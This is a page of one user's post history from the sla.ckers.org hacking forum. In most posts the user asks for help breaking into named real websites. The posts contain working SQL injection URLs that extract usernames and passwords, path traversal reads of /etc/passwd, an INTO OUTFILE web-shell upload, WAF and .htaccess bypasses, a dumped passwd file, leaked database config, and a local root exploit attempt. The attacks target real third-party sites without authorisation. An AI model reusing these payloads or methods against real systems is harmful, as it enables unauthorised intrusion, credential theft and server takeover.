Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Bug reports, feature enhancements or other complaints with the site, with us or just tell us what a miserable existance you have. No death threats or poetry please. Just kidding, no poetry please. 

Pages: 12Next
Current Page: 1 of 2
Results 1 - 30 of 41
3 years ago
TopSaT13
thanggiangho Wrote: ------------------------------------------------------- > ok- 403 forbbiden when i add ' >>>no injection ( > not sure) > > :D 99% no vuln
Forum: SQL and Code Injection
3 years ago
TopSaT13
source code of page <?php session_start();?> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <?php //$link = mysql_connect("127.0.0.1","x","x") or die("Impossible de se connecter"); //mysql_select_db("khaldoun") or die("Could not select database"); if (!isset($_G
Forum: SQL and Code Injection
3 years ago
TopSaT13
thanks brothers but ... %00 and %0a ca't do anything so i can't remove extenction .php ?id=php://filter/read=convert.base64-encode/resource=/etc/passwd%0A => Warning: include(php://filter/read=convert.base64-encode/resource=/etc/passwd .php) : failed to open stream: No such file or directory in /var/www/site/index.php on line 70 and ?id=php://filter/read=convert.base64-encode/resource
Forum: SQL and Code Injection
3 years ago
TopSaT13
Reiners Wrote: ------------------------------------------------------- > as you see in the warning there is no filter and > the file name is passed successfully to the > include function. something else must be wrong. > are you sure the file exists? yes exist :) why i can't read /etc/passwd ?.. ?id=/etc/passwd result==> Warning: include(/etc/passwd.php) : failed to o
Forum: SQL and Code Injection
3 years ago
TopSaT13
Hey freands! i found an lfi vuln.. but i cant read /etc/passwd or any file not in vuln directory look : ?id=php://filter/read=convert.base64-encode/resource=index.php ===>> Warning: include(php://filter/read=convert.base64-encode/resource=index.php.php) : failed to open stream: No such file or directory in /var/www/site/index.php on line 70 ---------- and i del .php----- ?id=php:
Forum: SQL and Code Injection
3 years ago
TopSaT13
Powered by iWebKit :D
Forum: SQL and Code Injection
3 years ago
TopSaT13
VMw4r3 Wrote: ------------------------------------------------------- > Why do you want to bypass the filter when theres > no injection? yes...just like idea ! :D
Forum: SQL and Code Injection
3 years ago
TopSaT13
VMw4r3 Wrote: ------------------------------------------------------- > It looks like (') is filtered. ** yes bro i know but i need any method to bypass this filter ?
Forum: SQL and Code Injection
3 years ago
TopSaT13
Hi brothers all fine ^^ i found this web site vuln sqli delphi.dev-dz.com/autresites_detail.php?id=47 but when i add (') in value id=47' get Forbidden and order by 1 no error order by 10000000000000000-- no error but when i add (') like: autresites_detail.php?id=47' orde by 1--+ i get Forbidden pleaz my brothers ..any bypass this forbidden ! Thanx alot ! : )
Forum: SQL and Code Injection
3 years ago
TopSaT13
hi brothers...how ar u fine :D i found an vuln site rnd-dz.com/view_histo_fond_ar.php?news_id=-6%27+union+select+group_concat%28user_id,0x3e,username,0x3a,password,0x3e,email%29,2,3,4,5+from+sys_user--+ so when i use load file to read passwd file (or any file) ....not have any error and not get any file ?? like : rnd-dz.com/view_histo_fond_ar.php?news_id=-6%27+union+select+load_file%28%
Forum: SQL and Code Injection
3 years ago
TopSaT13
hi member's i hav shell on secure server many function was desabled by SEcurity but i can't bypass it info: PHP Version 5.2.15 desable fontions : Code: symlink,shell_exec,exec,proc_close,proc_open,popen,system,dl,passthru,escapeshel ​ larg,escapeshellcmd,posix_getgid,virtual,posix_getgrgid,dl,set_time_limit,exec,p ​ close,proc_nice,proc_terminate,proc_get_status,pfsockopen,leak,apache_c
Forum: Full Disclosure
3 years ago
TopSaT13
Plitvix : tnx my brother tnx all i found solution : etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/bin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync man:x:6:12:man:/var/cache/man:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/
Forum: SQL and Code Injection
3 years ago
TopSaT13
hi brothers ..fine? i found an sqli in universite.univ-tlemcen.dz .. when i put (') in search bar i found sql error Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/Annuaire/public_html/resultat_recherche.php on line 55 Erreur dans la requete: SELECT * FROM `enseignant` WHERE UPPER(nom) LIKE ''%' Avec erreur: You have an error in your SQL syntax; ch
Forum: SQL and Code Injection
3 years ago
TopSaT13
antivirus @ thank u bro :):) -------------------- waiting any helps for this injection http://www.abigailandeye.co.uk/client-gallery/index.php?pageId=104&start=0 Only For education
Forum: SQL and Code Injection
3 years ago
TopSaT13
Hy all, i fond this problm http://www.abigailandeye.co.uk/client-gallery/index.php?pageId=104&start=0 when i add (') = Frobidden :( order by 1 no error :) but order by 1000000000000000000000000 no error i add --+ at end i fond frobiden 0' order by 1 --+ = forbiden :-( any helps ?? pleaz :) ----- http://www.ubiquisys.com/ub3b/pressreleases.php?id=115 frobiden :(
Forum: SQL and Code Injection
4 years ago
TopSaT13
hy all evry one find this problm when he want to get root resutl is mmap:permission dinied because "Mmap_min_addr" not 0 evry one have how to bypass "Mmap_min_addr" and write on 0 "Zero" semple exemple: ------------------------------------------------------------- cat /proc/sys/vm/mmap_min_addr 0 gcc -o gayros local-root-exploit-gayros.c ./gayros we
Forum: Full Disclosure
4 years ago
TopSaT13
:O, i dont think those are hashes
Forum: SQL and Code Injection
4 years ago
TopSaT13
No comment..:@
Forum: SQL and Code Injection
4 years ago
TopSaT13
so hyrax i don't anderstard your problm give me url and i see good lookk
Forum: SQL and Code Injection
4 years ago
TopSaT13
hyrax @ lok brother im not children, ok i can't anderstad your problm by txt file, + im Ethical Hacker . so respect me . 2.i post url because by url i can test and tell you where is problm ok :@ so be respct
Forum: SQL and Code Injection
4 years ago
TopSaT13
lik bro :) to intect shell you must floder chmod 777 lik uploads/ , img/ if you not find floder chmod 777 you can't intect shell exemple: upload is chmod 777 hxxt://google.com/web.php?id=-1 union select 1,2,'test',4,5 into outfile '/home/google/pub/upload/tst.php'-- google . com /upload/tst.php ..found :)
Forum: SQL and Code Injection
4 years ago
TopSaT13
mybe run
Forum: Full Disclosure
4 years ago
TopSaT13
@VMw4re i find it :D <?php //Header("Cache-control: private, no-cache"); //Header("Expires: Mon, 26 Jun 1997 05:00:00 GMT"); //Header("Pragma: no-cache"); //Header ("Last-Modified: " . gmdate ("D, d M Y H:i:s") . " GMT"); // This is an example of config.php $dbhost = 'localhost'; $dbuser = 'singart_singuser'; $dbpass =
Forum: SQL and Code Injection
4 years ago
TopSaT13
thnk you my freand but , you use load file to read it?
Forum: SQL and Code Injection
4 years ago
TopSaT13
arabs found its since 200x
Forum: Bugs
4 years ago
TopSaT13
Hy all @hc0de .you can explique to me how to read config.php by this http://www.singaporeartmuseum.sg/exhibitions/details.php?id=-48+UNION+/*!SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12,13,0x2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6574632f706173737764
Forum: SQL and Code Injection
4 years ago
TopSaT13
@flics: Thank you my freand :) this: Options Indexes FollowSymLinks DirectoryIndex ssssss.htm AddType txt .php AddHandler txt .php ---------------- to bypass frobidden :) i use it on many server its run normaly :p i think , the root desable some commands htaccess
Forum: SQL and Code Injection
Pages: 12Next
Current Page: 1 of 2